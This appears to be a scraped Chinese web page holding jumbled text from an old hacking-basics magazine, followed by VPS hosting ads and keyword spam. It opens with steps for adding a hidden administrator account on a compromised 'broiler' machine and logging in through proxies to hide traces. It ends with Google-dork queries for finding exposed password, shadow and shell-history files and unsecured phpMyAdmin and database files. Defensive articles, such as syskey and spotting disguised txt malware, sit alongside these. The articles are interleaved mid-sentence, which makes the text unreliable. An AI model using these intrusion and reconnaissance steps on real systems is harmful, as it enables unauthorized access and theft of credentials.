否则每次总是用别人的,那还怎么叫是自己的机器我们现在来给自己添加一个用户名,并把自己提升成为root权限,这样我们就可以在肉鸡上做任何事情了.
打开流光,选择"工具→NT管道命令",填上刚才得到的用户名跟密码,点击"确定"后进入NTCMD界面,在提示符下键入"CMD",连接成功以后在系统提示符下进行如下操作:C:\>netuseradminadd(添加一个用户名为admin的用户.
)C:\>netuseradminshonline788(使得admin的密码是shonline788.
)C:\>netlocalgroupadministratorsadminadd(把用户admin提升为administrator即管理员身份)这样我们就成功地在这台机器中取得了root权限,可以作任何事情了.
下一步就要用上我们刚才准备的这些工具了.
其中前面两个工具Sockscap和sksockserverGUI是附属的工具,它们用来配合实现跳板的使用,可以隐藏我们的入侵痕迹.
在网上找几个Socks代理,把Sockscap和sksockserverGUI设置好,再把mstsc的图标拖到Sockscap里去.
之后双击mstsc的图标,在其中填上刚才找到的肉鸡的IP地址:x.
x.
0.
14,按回车键进行连接.
成功以后,会出现一个跟Win-dows2000一样的蓝色登录界面,在里面填上我们刚才添加的用户名与密码,敲回车键登录.
登录成功以后就会出现该主机的图形界面,这个时候你就可以象操作自己的机器一样,操作这台肉鸡了.
在WindowsXP和Windows2000系统中有一个大家不常用,但是功能强大的命令——syskey命令.
这个命令可以有效地增强你的系统安全性.
也许你要说进入WindowsXP或Windows2000的时候需要输入账户和密码,这样已经够安全了.
但其实只要你的电脑是多人使用,其他人完全可以通过各种方法来进入系统,利用种种漏洞来获取管理员权限.
而有了用syskey制作的加密软盘,你就可以完全放心使用Windows2000和WindowsXP了.
下面我们来看看syskey命令的用法.
一、双重密码保护的设置1.
在开始菜单的"运行"中输入"syskey",点击确定.
WindowsXP超强syskey命令16图3图2图12.
这个界面所提到的账户数据库便是NTFS加密的原理所在,对于一般用户,不需要了解原理,只要会用就行.
下一步点击"更新".
3.
这里我们选择密码启动,输入一个密码,然后点击确定.
这样做将使Windows在启动时需要多输入一次密码,起到了2次加密的作用.
操作系统启动时在往常我们输入用户名和密码之前会出现窗口提示"本台计算机需要密码才能启动,请输入启动密码".
这便是我们刚刚创造的双重密码保护.
二、密码软盘的制作1.
如果我们选择"在软盘上保存启动密码",这样将生成一个密码软盘,没有这张软盘,谁也别想进入你的操作系统.
当然,如果你之前设置了syskey系统启动密码,这里还会需要你再次输入那个密码,以获得相应的授权,这有点类似我们在更改QQ密码的时候,必须知道原来的密码一样.
2.
然后系统会提示你在软驱中放入软盘,当密码软盘生成后会出现提示.
3.
然后我们再次启动系统,这时系统会提示你插入密码软盘,如果你不插入软盘就点击确定,系统是不会放行的.
除此之外,插入的密码软盘还可以根据不同账户输入不同的密码.
同时如果你愿意,密码软盘中的密匙文件可以复制到其他软盘上.
三、去除密码软盘假如有一天,你对操作系统的安全性要求不那么高了,或者你厌烦了每次进入系统都需要插入软盘,怎么办选择"在本机上保存启动密码"就可以了,当然,进行这一步操作你必须要有存有密匙的软盘,这与制作密码软盘时要求输入授权密码是一个道理.
17黑客基本技巧很多人认为txt文件没有危险,因此在网上遇到陌生人发来的txt文件时往往麻痹大意.
很多黑客利用这一点,将各种有害文件伪装成txt文件,以达到不可告人的目的.
下面我们就来一一揭开这些有害文件伪装的外衣.
一、隐藏扩展名的txt文件假如你收到这样的邮件"QQ靓号放送.
txt",你是不是认为它肯定是纯文本文件不一定.
它的实际文件名可能是"QQ靓号放送.
txt.
{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}".
其中{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}揪出伪装成txt的有害文件是注册表里HTML文件关联的意思.
但是储存为文件名的时候它并不会显现出来,这个文件实际上等同于QQ靓号放送.
txt.
html.
如果你双击它,以为会打开记事本,结果它却调用了HTML来运行,那就只有天知道它要做什么了,删除文件格式化硬盘都有可能.
识别及防范方法1.
这种txt文件显示的并不是文本文件的图标,而是未定义文件类型的标志,这是区分它与正常txt文件的最好方法.
2.
另一个识别方法是在"按Web页方式"查看时在"我的电脑"左面会显示出其文件名全称(如大家都知道IE的收藏夹有个导出功能,IE收藏夹导出的收藏夹网页都有个共同特点——页面的标题都是"bookmarks".
正好,百度搜索有一个"title"语法功能,利用该功能我们可以轻易地搜寻到互联网上所有的收藏夹网页,看看别人都喜欢哪些站点.
方法一:直捣黄龙"title"语法的用法很简单,只需要用"Atitle:bookmarks"为关键字在百度中搜索即可.
"A"为其中一个关键字.
比如如果你想搜索"在线听歌"的网站,那么可以用"歌曲title:bookmarks"进行搜索.
方法二:顺藤摸瓜除此之外,我们还可以来招"顺藤摸瓜",通过某个不错的站点来获得更多同类的优秀站点.
比如,有个叫"小木虫"的网站(http://www.
用百度偷窥别人收藏夹emuch.
net),笔者觉得它还不错,所以想看看收藏这个站点的人还收藏了些什么好站.
只需要在百度中用"小木虫title:bookmarks"为关键字进行搜索即可.
需要注意的是,这里的"小木虫"必须是网站标题的一部分,比如百度站点的标题就是"百度——全球最大中文搜索引擎",那么我们就可以用"中文搜索引擎title:bookmarks"来搜索那些收藏了百度的人还收藏了什么网站.
图118图1).
这里再次提醒你,注意你收到的邮件中附件的文件名,不仅要看显示出来的扩展名,还要注意其实际显示的图标是什么.
3.
对于中看起来像是txt的文件,可以将它下载后用鼠标右键选择"用记事本打开",这样会很安全.
二、恶意碎片文件另一类可怕的txt文件是一种在Windows中被称作"碎片对象"(扩展名为shs)的文件,它一般被伪装成文本文件通过电子邮件来传播,比方说形如:QQ号码放送.
txt.
shs的文件.
由于真正的后缀名shs不会显示出来,如果在文件中含有诸如"format"之类的命令将非常可怕.
另外,它具有很强的隐蔽性,这是因为:1.
碎片对象文件的默认图标是一个和记事本文件相类似的图标,很容易被误认为是一些文本的文档,用户对它的警惕心理不足.
2.
在Windows的默认状态下,"碎片对象"文件的扩展名是隐藏的,即使你在"资源管理器"→"工具"→"文件夹选项"→"查看"中,把"隐藏已知文件类型的扩展名"前面的"√"去掉,shs也还是隐藏的,这是因为Windows支持双重扩展名,如"QQ号码放送.
txt.
shs"显示出来的名称永远是"QQ号码放送.
txt".
3.
你用任何杀毒软件都不会找到这个文件的一点问题,因为这个文件本身就没有病毒,也不是可执行的,而且还是系统文件.
你会怀疑这样的文件吗防范方法在注册表编辑器的"HKEY_CLASSES_ROOT\ShellScrap"分支下,有一个名称为"NeverShowExt"的键,它是导致shs文件扩展名无法显示的罪魁祸首.
删除这个键值,你就可以看到shs文件扩展名了.
另外,还可以更换"碎片对象"文件的默认图标.
打开"资源管理器"→"查看"→"文件夹选框"→"文件类型"→"已注册的文件类型"→"碎片对象",单击"编辑",在"编辑文件类型"对话框中单击"更改图标"按钮.
打开C:/WINDOWS/SYSTEM/Pifmgr.
dll,选择一个新图标即可.
三、改头换面的Outlook除了上面所说的两类危险的txt文件外,还有一种改头换面的Outlook邮件.
它看似txt文件,其实是exe文件.
当你用Outlook2000收到邮件时,它可能会显示这是一个带的邮件,双击打开时,Outlook会提示:部分对象携带病毒,可能对你的计算机造成危害,因此,请确保该对象来源可靠.
这说明该有问题.
识别方法尽管这种文件的迷惑性极大,但是仍然会露出一些马脚:1.
它其实是一个OLE对象,并不是,它的选择框不同于的选择框.
点击鼠标右键出现的菜单与正常的菜单不同.
2.
双击打开它时,安全提示与的安全提示不同,这点非常重要.
这时,应该选择"NO",然后点击鼠标右键,选择"编辑包".
当提示"是否信任该对象"时,选择"YES".
这时在对象包装程序的右边内容框中,将现出该文件的原形.
3.
因为它不是,在选择"文件"→"保存"时并无对话框出现.
4.
由于并不是所有的邮件收发软件都支持对象嵌入,所以这类邮件的格式不一定被某些软件识别.
但是Outlook的使用面很广,尤其是在比较大图119黑客基本技巧网络电话(视频电话、宽带电话或视频宽带电话)又叫VoIP,即VoiceoverInternetProtocol的缩写,是基于IP网络的语音传输技术.
网上有许多的网络电话软件,通过这些网络电话软件,可以免费打电话.
下面推荐一款网络电话软件TelTel.
进入软件官方网站http://www.
teltel.
com/,单击页面右上方的"简体中文"超链接,就可进入TelTel的简体中文页面(图1).
单击"立即下载(完全免费)"按钮,进入TelTel下载页面.
单击"大陆网站下载"超链接即可开始下载TelTel网络电话.
将TelTel下载并安装完成后,就可以使用TelTel了.
单击"登录"按钮,出现"登录"对话框,如果你以前使用过TelTel并注册了用户,可在此直接输入已注册用户的电子邮件和密码.
如果是新用免费拨打任意电话户,则单击"注册"按钮进行注册,在出现的"建立账户"对话框中输入你的电子邮件地址(图2).
然后单击"下一步"按钮,出现"设定个人信息"对话框,在此图1我们知道对文件加密有许多种方式,例如用第三方加密软件.
其实用系统漏洞也能加密文件.
Windows系统下不能够以一些字样来命名文件或文件夹,包括:"aux"、"com1"、"com2"、"prn"、"con"和"nul"等,因为这些名字都属于设备名称,等价于一个DOS设备,如果我们把文件或文件夹命名为这些名字,Windows就会误以为发生重名,提示"不能创建同名的文件".
我们可以利用这漏洞来加密文件.
假如要把C盘的1.
txt加密.
可以选择桌面右用漏洞加密文件下角的"开始"-"运行",在运行框里输入"cmd"后点击"确定",打开cmd命令框.
输入"copyc:\1.
txt\\.
\c:\aux.
txt"(或者其它几个名字都可以).
这样,在C盘下就生成了一个名字为aux.
txt的文本文档.
但是这个文档在Windows界面下是打不开的,因此起到了加密的作用.
要打开文件也很简单,在cmd命令框里输入"\\.
\c:\aux.
txt"即可.
要删除文件则输入"del\\.
\c:\aux.
txt".
的、有自己Mail服务器的公司,所以还是有必要提醒大家小心嵌入对象.
不光是Outlook,Word、Excel等支持嵌入对象的软件也可以让嵌入对象改头换面迷惑人.
上面介绍了三种伪装成txt文件的有害软件.
其实只要我们在上网时足够小心,按本文所说的防范方法去做,就不会有危险了.
20输入密码及显示的姓名.
单击"下一步"按钮,出现"开始"对话框,提示用户注册成功,TelTel已经寄出封电子邮件到你的注册邮箱中.
单击"完成"按钮,登录到你的注册邮箱中,打开TelTel寄给你的邮件,根据提示单击链接来激活账户,然后就可使用TelTel软件了.
TelTel对拨打固定电话、小灵通及手机的用户做了一定的限制,你的TelTel中必须有3个或3个以上的好友才可拨打电话,并且添加的好友越多,则越有机会打通电话.
因此,用户在使用TelTel拨打电话前,还需要进行添加好友操作.
单击"加好友"按钮,出现"加入新朋友"对话框,你可以选择两种方式来邀请朋友,单击"直接查询TelTelID或发送电子邮件邀请信"单选按钮,单击"下一步"按钮,在出现的对话框中输入你TelTel朋友的账号或电子邮件地址(图3).
再单击"下一步"按钮,在出现的窗口中输入你朋友的电子邮件地址,也可输入你朋友的名字及你自己的名字,单击"下一步"按钮完成新朋友的添加.
另外一种添加好友的方式是通过QQ、泡泡、MSN、雅虎通等即时通讯软件发送邀请,你也可以单击"用即时通讯软件发送邀请"单选按钮,单击"下一步"按钮,出现"发送即时讯息来邀请朋友"对话框,将TelTel给出的链接复制,并通过即时通讯软件发送给你的好友,请你的好友点击此链接即可(图4).
另外,你可以将你的账号公布在TelTel图3图4的论坛里,这样很快就可以添加到很多的好友了.
TelTel拨打国内长途电话的方法与其他的网络电话软件有所不同,拨打国内固定电话和小灵通时,需要在电话号码前加上代码"+86",然后再输入电话所在省份的区号,但需要将区号前面的"0"去掉,最后再输入对方的固定电话号,单击"拨号"按钮即可.
举个例子,如果你要拨打上海(021)的固定电话5718则在"拨号"按钮的左边输入"+86215718####",或在TelTel提供的拨号器中单击相应数字进行拨号,输入完成后单击"拨号"按钮即可呼叫对方电话.
如果要拨打中国手机1391234####,则在"拨号"左边输入"+861391234####"即可,应注意拨打手机时不要加区号,直接输入"+86"再加对方手机号,然后单击"拨号"按钮即可.
图221黑客基本技巧Googlehacking其实并算不上什么新东西,只是最初黑客们并没有重视这种技术,认为它并无太大实际用途.
其实,Googlehacking并非如此简单.
Googlehacking的简单实现是指用Google中的一些语法可以提供给我们有用的信息(这里是黑客们攻击时需要的信息),下面就来介绍一下用Google搜索黑客攻击信息的方法.
一、基本语法1.
intext:这个语句可以是把网页中的正文内容中的某个字符做为搜索条件,例如在Google里输入"intext:动网",将返回所有在网页正文部分包含动网的网页.
2.
intitle:和intext用法差不多,主要是搜索网页标题中是否有我们所要找的字符,例如搜索"intitle:安全天使",将返回所有网页标题中包含"安全天使"的网页.
3.
cache:搜索Google里关于某些内容的缓存,有时候也许能找到一些好东西.
4.
define:搜索某个词语的定义.
例如搜索"define:hacker",将返回关于hacker的定义.
5.
filetype:这个语句比较重要,无论是撒网式攻击还是我们后面要说的搜索指定类型的文件都有可能用到它.
例如输入:"iletype:doc",将返回所有以doc结尾的文件URL.
将"doc"换成"bak"、"mdb"或"inc"也可以,获得的信息也许会更丰富.
6.
info:查找指定站点的一些基本信息.
7.
inurl:用Google搜索有用的黑客信息搜索我们指定的字符是否存在于URL中.
例如输入"inurl:admin",将返回N个类似于这样的连接:"http://www.
xxx.
com/xxx/admin".
用它来找管理员登录的URL效果不错.
"allinurl"也同"inurl"类似,不过可以指定多个字符.
8.
link:可以搜索和输入网站做了链接的所有网站.
例如搜索"link:www.
xxx.
net"就可以返回所有和www.
xxx.
net做了链接的URL.
9.
site:这个语句也很有用,例如搜索"site:www.
xxx.
net"将返回所有和xxx.
net这个站有关的URL.
除此之外,在搜索语句中加入一些符号也是很有用的:如"+"可以把Google可能忽略的字列入查询范围;"-"可以在查询时把某个字忽略;"~"代表同义词;".
"为单一通配符,可代表任意一个字符;"*"为通配符,代表多个任意字符;""""表示精确查询其内部的字符内容.
二、实际应用对于一个居心叵测的攻击者来说,可能他最感兴趣的就是密码文件了.
而Google因为其强大的搜索能力往往会把一些敏感信息透露给他们.
有时候因为各种各样的原因,一些重要的密码文件被毫无保护地暴露在网络上.
只要用Google搜索以下等等内容就能得到很多包含重要密码的网页.
intitle:"indexof"etcintitle:"Indexof".
sh_historyintitle:"Indexof".
bash_historyintitle:"indexof"passwdintitle:"indexof"people.
lstintitle:"indexof"pwd.
dbintitle:"indexof"etcshadowintitle:"indexof"spwd22intitle:"indexof"master.
passwd"#-FrontPage-"inurl:service.
pwd下面就是一个用Google找到的FreeBSD系统的passwd文件(图1).
phpmyadmin是一套功能强大的数据库操作软件,好多网站都用它来进行网站数据库管理.
一些站点由于配置失误,导致我们可以不使用密码直接对phpmyadmin进行操作,我们可以这样用Google搜索存在这样漏洞的URL:"intitle:phpmyadminintext:Createnewdatabase"(图2).
图1同样我们可以用"allinurl:winntsystem32"找到其它存在CGI漏洞的页面(图3).
前面我们已经简单地说过可以用Google来搜索数据库文件,用一些语法来精确查找能够获得更多东西(access的数据库、mssql、mysql的连接文件等等).
举个例子示例一下:allinurl:bbsdatafiletype:mdbinurl:databasefiletype:incconninurl:datafiletype:mdbintitle:"indexof"data按照上面的思路,我们还可以用Google来找后台等等.
总之,在了解基本语法后要靠自己不断摸索实践才能更熟练地让Google成为我们攻击的好帮手.
图2图3图3

Hostodo(年付12美元)斯波坎VPS六六折,美国西海岸机房

Hostodo是一家成立于2014年的国外VPS主机商,现在主要提供基于KVM架构的VPS主机,美国三个地区机房:拉斯维加斯、迈阿密和斯波坎,采用NVMe或者SSD磁盘,支持支付宝、PayPal、加密货币等付款方式。商家最近对于上架不久的斯波坎机房SSD硬盘VPS主机提供66折优惠码,适用于1GB或者以上内存套餐年付,最低每年12美元起。下面列出几款套餐配置信息。CPU:1core内存:256MB...

香港云服务器 1核 256M 19.9元/月 Mineserver Ltd

Mineserver(ASN142586|UK CompanyNumber 1351696),已经成立一年半。主营香港日本机房的VPS、物理服务器业务。Telegram群组: @mineserver1 | Discord群组: https://discord.gg/MTB8ww9GEA7折循环优惠:JP30(JPCN2宣布产品可以使用)8折循环优惠:CMI20(仅1024M以上套餐可以使用)9折循...

DMIT:新推出美国cn2 gia线路高性能 AMD EPYC/不限流量VPS(Premium Unmetered)$179.99/月起

DMIT,最近动作频繁,前几天刚刚上架了日本lite版VPS,正在酝酿上线日本高级网络VPS,又差不多在同一时间推出了美国cn2 gia线路不限流量的美国云服务器,不过价格太过昂贵。丐版只有30M带宽,月付179.99 美元 !!目前美国云服务器已经有个4个套餐,分别是,Premium(cn2 gia线路)、Lite(普通直连)、Premium Secure(带高防的cn2 gia线路),Prem...

socks5代理软件为你推荐
太空国家国际空间站有哪些国家的人?摩拜超15分钟加钱摩拜单车免费卡和5元90天能叠加吗sonicchatwe chat和微信区别rawtoolsU盘显示是RAW格式怎么办m.2828dy.com电影虫www.dyctv.com这个电影站能下载电影吗?www.baitu.com谁有免费的动漫网站?4400av.com在www.dadady.com 达达电影看片子很快的啊59ddd.com网站找不到了怎么办啊dpscyclewow3.13术士的PVE的命中多少够了?蜘蛛机器人在《红色警戒2共和国之辉》中,对付“蜘蛛机器人”的最好武器是什么?
raksmart idc测评网 英语简历模板word 鲜果阅读 win8.1企业版升级win10 全能主机 嘟牛 域名转向 asp免费空间申请 免费申请网站 免费网页空间 服务器硬件防火墙 卡巴斯基是免费的吗 怎么建立邮箱 电信托管 免费私人服务器 香港亚马逊 免费asp空间 lamp怎么读 免费php空间 更多